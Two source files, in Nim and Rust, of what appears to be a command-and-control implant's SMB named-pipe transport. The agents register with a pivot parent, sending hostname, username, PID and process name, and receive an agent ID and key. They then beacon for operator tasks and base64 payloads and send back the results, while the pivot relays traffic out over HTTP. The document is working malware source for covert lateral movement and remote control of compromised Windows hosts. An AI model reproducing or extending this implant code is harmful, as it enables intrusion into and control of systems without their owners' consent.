File: agents/agent-nim/transport_smb.nim
## SMB named-pipe transport for Nim agent.
## Wire protocol matches Go transport_smb_windows.go:
##   each message is [4-byte LE length][JSON payload]
## The pivot parent (Go pipe_server_windows.go) handles AES and HTTP relay.
import winim/lean
import std/[json, base64, strutils]
import config

# WaitNamedPipeW is not always in winim/lean — declare explicitly
proc WaitNamedPipeW(lpName: LPCWSTR, nTimeOut: DWORD): WINBOOL
  {.stdcall, dynlib: "kernel32", importc.}

type AgentTransport* = object
  pipe*:    HANDLE
  agentId*: string
  aesKey*:  seq[byte]   # kept for compatibility; pivot handles crypto

# ── framing ─────────────────────────────────────────────────────────────────

proc pipeReadMsg(pipe: HANDLE): seq[byte] =
  var hdr: array[4, byte]
  var got: DWORD
  if not ReadFile(pipe, addr hdr[0], 4, addr got, nil).bool or got < 4:
    return @[]
  let length = uint32(hdr[0]) or (uint32(hdr[1]) shl 8) or
               (uint32(hdr[2]) shl 16) or (uint32(hdr[3]) shl 24)
  if length == 0 or length > 10_000_000'u32: return @[]
  result = newSeq[byte](int(length))
  var offset = 0
  while offset < int(length):
    if not ReadFile(pipe, addr result[offset],
                    DWORD(int(length) - offset), addr got, nil).bool:
      return @[]
    inc offset, int(got)

proc pipeWriteMsg(pipe: HANDLE; data: seq[byte]) =
  let n = uint32(data.len)
  var hdr = [byte(n), byte(n shr 8), byte(n shr 16), byte(n shr 24)]
  var got: DWORD
  discard WriteFile(pipe, addr hdr[0], 4, addr got, nil)
  if data.len > 0:
    discard WriteFile(pipe, unsafeAddr data[0], DWORD(data.len), addr got, nil)

# ── connection ───────────────────────────────────────────────────────────────

proc openPipe(name: string): HANDLE =
  let full = if name.startsWith("\\\\"): name else: r"\\.\pipe\" & name
  CreateFileW(newWideCString(full),
    GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL, 0)

proc newTransport*(): AgentTransport =
  let full = r"\\.\pipe\" & SMBPipe
  while true:
    result.pipe = openPipe(SMBPipe)
    if result.pipe != INVALID_HANDLE_VALUE: return
    discard WaitNamedPipeW(newWideCString(full), 5000)

# ── protocol ─────────────────────────────────────────────────────────────────

proc getEnvStr(k, default: string): string =
  var buf = newWideCString(newString(512))
  let n = GetEnvironmentVariableW(newWideCString(k), buf, 512)
  if n == 0: return default
  $buf

proc exeName*(): string =
  var buf = newWideCString(newString(MAX_PATH))
  let n = GetModuleFileNameW(0, buf, MAX_PATH)
  if n == 0: return "agent.exe"
  let full = $buf
  let i = max(full.rfind('\\'), full.rfind('/'))
  if i < 0: full else: full[i+1..^1]

proc register*(t: var AgentTransport): bool =
  let req = %*{
    "type":         "REGISTER",
    "hostname":     getEnvStr("COMPUTERNAME", "UNKNOWN"),
    "username":     getEnvStr("USERNAME", "UNKNOWN"),
    "os":           "windows/amd64",
    "pid":          int(GetCurrentProcessId()),
    "transport":    "smb",
    "sleep_sec":    SleepSec,
    "jitter_pct":   JitterPct,
    "process_name": exeName(),
    "is_admin":     false
  }
  pipeWriteMsg(t.pipe, cast[seq[byte]]($req))
  let resp = pipeReadMsg(t.pipe)
  if resp.len == 0: return false
  try:
    let j = parseJson(cast[string](resp))
    t.agentId = j["agent_id"].getStr()
    t.aesKey  = cast[seq[byte]](base64.decode(j["aes_key"].getStr()))
    return true
  except: return false

type TaskWire* = object
  id*:      int64
  typ*:     string
  args*:    string
  payload*: seq[byte]

proc beacon*(t: var AgentTransport): seq[TaskWire] =
  let req = %*{"type": "BEACON", "agent_id": t.agentId}
  pipeWriteMsg(t.pipe, cast[seq[byte]]($req))
  let resp = pipeReadMsg(t.pipe)
  if resp.len == 0: return @[]
  try:
    let s = cast[string](resp)
    if s == "null" or s == "": return @[]
    let j = parseJson(s)
    if j.kind != JArray: return @[]
    for tw in j:
      var task = TaskWire(
        id:   tw["id"].getBiggestInt(),
        typ:  tw["type"].getStr(),
        args: tw{"args"}.getStr(""))
      let pl = tw{"payload"}.getStr("")
      if pl != "": task.payload = cast[seq[byte]](base64.decode(pl))
      result.add(task)
  except: discard

proc sendResult*(t: var AgentTransport; taskId: int64; output, errStr: string) =
  let req = %*{
    "type":     "RESULT",
    "task_id":  taskId,
    "output":   output,
    "error":    errStr,
    "agent_id": t.agentId
  }
  pipeWriteMsg(t.pipe, cast[seq[byte]]($req))

proc sendResultAdmin*(t: var AgentTransport; taskId: int64;
                      output, errStr: string; isAdmin: bool) =
  let req = %*{
    "type":     "RESULT",
    "task_id":  taskId,
    "output":   output,
    "error":    errStr,
    "agent_id": t.agentId,
    "is_admin": isAdmin
  }
  pipeWriteMsg(t.pipe, cast[seq[byte]]($req))

proc uploadFile*(t: var AgentTransport; taskId: int64;
                 filename: string; data: seq[byte]) =
  # Not supported via pipe — acknowledge task
  t.sendResult(taskId, "[!] uploadFile not supported over SMB pivot", "")

proc downloadFile*(t: var AgentTransport; filename: string): seq[byte] =
  return @[]

File: agents/agent-rust/src/transport_smb.rs
//! SMB named-pipe transport.
//!
//! Wire protocol: [4-byte LE length][JSON payload] — plain (no AES).
//! Registration: {"type":"REGISTER","hostname":...} → {"agent_id":"...","aes_key":"..."}
//! Beacon:       {"type":"BEACON","agent_id":"..."}  → JSON array of tasks or null
//! Result:       {"type":"RESULT","task_id":N,"output":"...","error":"...","agent_id":"..."}

use core::ptr;
use windows_sys::Win32::Foundation::{CloseHandle, GENERIC_READ, GENERIC_WRITE,
    INVALID_HANDLE_VALUE};
use crate::transport::wstr;

const OPEN_EXISTING:       u32 = 3;
const FILE_ATTRIBUTE_NORMAL: u32 = 0x80;

// Raw pipe I/O — avoids windows-sys feature-path issues (see dotnet.rs pattern)
extern "system" {
    fn CreateFileW(lpFileName: *const u16, dwDesiredAccess: u32, dwShareMode: u32,
                   lpSecurityAttributes: *const core::ffi::c_void,
                   dwCreationDisposition: u32, dwFlagsAndAttributes: u32,
                   hTemplateFile: isize) -> isize;
    fn ReadFile(hFile: isize, lpBuffer: *mut u8, nNumberOfBytesToRead: u32,
                lpNumberOfBytesRead: *mut u32, lpOverlapped: *const core::ffi::c_void) -> i32;
    fn WriteFile(hFile: isize, lpBuffer: *const u8, nNumberOfBytesToWrite: u32,
                 lpNumberOfBytesWritten: *mut u32, lpOverlapped: *const core::ffi::c_void) -> i32;
    fn WaitNamedPipeW(lpNamedPipeName: *const u16, nTimeOut: u32) -> i32;
}

use base64::{engine::general_purpose::STANDARD, Engine as _};

pub type PipeHandle = isize; // HANDLE

pub fn open_pipe(pipe_name: &str) -> PipeHandle {
    let full = if pipe_name.starts_with("\\\\") {
        pipe_name.to_string()
    } else {
        format!(r"\\.\pipe\{}", pipe_name)
    };
    let full_w = wstr(&full);
    unsafe {
        let w_full = wstr(&full);
        // Wait up to 5 seconds for the pipe to be available
        WaitNamedPipeW(w_full.as_ptr(), 5000);
        CreateFileW(
            full_w.as_ptr(),
            GENERIC_READ | GENERIC_WRITE,
            0,
            ptr::null(),
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            0,
        )
    }
}

pub fn close_pipe(h: PipeHandle) {
    if h != INVALID_HANDLE_VALUE && h != 0 {
        unsafe { CloseHandle(h); }
    }
}

fn pipe_read_exact(h: PipeHandle, buf: &mut [u8]) -> bool {
    let mut offset = 0;
    while offset < buf.len() {
        let mut got: u32 = 0;
        let ok = unsafe {
            ReadFile(h, buf.as_mut_ptr().add(offset), (buf.len() - offset) as u32, &mut got, ptr::null_mut())
        };
        if ok == 0 || got == 0 { return false; }
        offset += got as usize;
    }
    true
}

fn pipe_write_all(h: PipeHandle, data: &[u8]) -> bool {
    let mut offset = 0;
    while offset < data.len() {
        let mut wrote: u32 = 0;
        let ok = unsafe {
            WriteFile(h, data.as_ptr().add(offset), (data.len() - offset) as u32, &mut wrote, ptr::null_mut())
        };
        if ok == 0 || wrote == 0 { return false; }
        offset += wrote as usize;
    }
    true
}

pub fn pipe_read_msg(h: PipeHandle) -> Option<Vec<u8>> {
    let mut hdr = [0u8; 4];
    if !pipe_read_exact(h, &mut hdr) { return None; }
    let len = u32::from_le_bytes(hdr) as usize;
    if len == 0 || len > 10 * 1024 * 1024 { return None; }
    let mut data = vec![0u8; len];
    if !pipe_read_exact(h, &mut data) { return None; }
    Some(data)
}

pub fn pipe_write_msg(h: PipeHandle, data: &[u8]) -> bool {
    let hdr = (data.len() as u32).to_le_bytes();
    pipe_write_all(h, &hdr) && pipe_write_all(h, data)
}

// ── Transport operations ──────────────────────────────────────────────────────

pub fn register(h: PipeHandle) -> Option<(String, Vec<u8>)> {
    let hostname = std::env::var("COMPUTERNAME").unwrap_or_else(|_| "UNKNOWN".into());
    let username = std::env::var("USERNAME").unwrap_or_else(|_| "UNKNOWN".into());
    let pid      = std::process::id();

    let exe = std::env::current_exe()
        .ok()
        .and_then(|p| p.file_name().map(|n| n.to_string_lossy().into_owned()))
        .unwrap_or_else(|| "agent.exe".to_string());

    let req = serde_json::json!({
        "type":         "REGISTER",
        "hostname":     hostname,
        "username":     username,
        "os":           "windows/amd64",
        "pid":          pid,
        "process_name": exe,
        "is_admin":     false,
        "language":     "rust",
    }).to_string();

    if !pipe_write_msg(h, req.as_bytes()) { return None; }
    let resp_bytes = pipe_read_msg(h)?;
    let resp: serde_json::Value = serde_json::from_slice(&resp_bytes).ok()?;
    let agent_id  = resp["agent_id"].as_str()?.to_string();
    let aes_key_b64 = resp["aes_key"].as_str().unwrap_or("");
    let aes_key = if aes_key_b64.is_empty() {
        Vec::new()
    } else {
        base64::engine::general_purpose::STANDARD.decode(aes_key_b64).unwrap_or_default()
    };
    Some((agent_id, aes_key))
}

pub fn beacon(h: PipeHandle, agent_id: &str) -> Option<Vec<u8>> {
    let req = serde_json::json!({
        "type":     "BEACON",
        "agent_id": agent_id,
    }).to_string();
    if !pipe_write_msg(h, req.as_bytes()) { return None; }
    let resp = pipe_read_msg(h)?;
    if resp.is_empty() || resp == b"null" { return None; }
    Some(resp)
}

pub fn send_result(h: PipeHandle, agent_id: &str, task_id: i64, output: &str, error: &str, is_admin: bool) -> bool {
    let req = serde_json::json!({
        "type":     "RESULT",
        "task_id":  task_id,
        "output":   output,
        "error":    error,
        "agent_id": agent_id,
        "is_admin": is_admin,
    }).to_string();
    pipe_write_msg(h, req.as_bytes())
}

/// Parse SMB beacon response — JSON array directly (not wrapped in {"tasks":[...]}).
pub fn parse_smb_tasks(resp: &[u8]) -> Vec<super::transport::TaskWire> {
    use base64::Engine;
    let arr: serde_json::Value = match serde_json::from_slice(resp) {
        Ok(v) => v,
        Err(_) => return vec![],
    };
    let arr = match arr.as_array() {
        Some(a) => a,
        None    => return vec![],
    };
    arr.iter().map(|t| super::transport::TaskWire {
        id:      t["id"].as_i64().unwrap_or(0),
        typ:     t["type"].as_str().unwrap_or("").to_string(),
        args:    t.get("args").and_then(|v| v.as_str()).unwrap_or("").to_string(),
        payload: t.get("payload")
                  .and_then(|v| v.as_str())
                  .filter(|s| !s.is_empty())
                  .and_then(|s| base64::engine::general_purpose::STANDARD.decode(s).ok())
                  .unwrap_or_default(),
    }).collect()
}
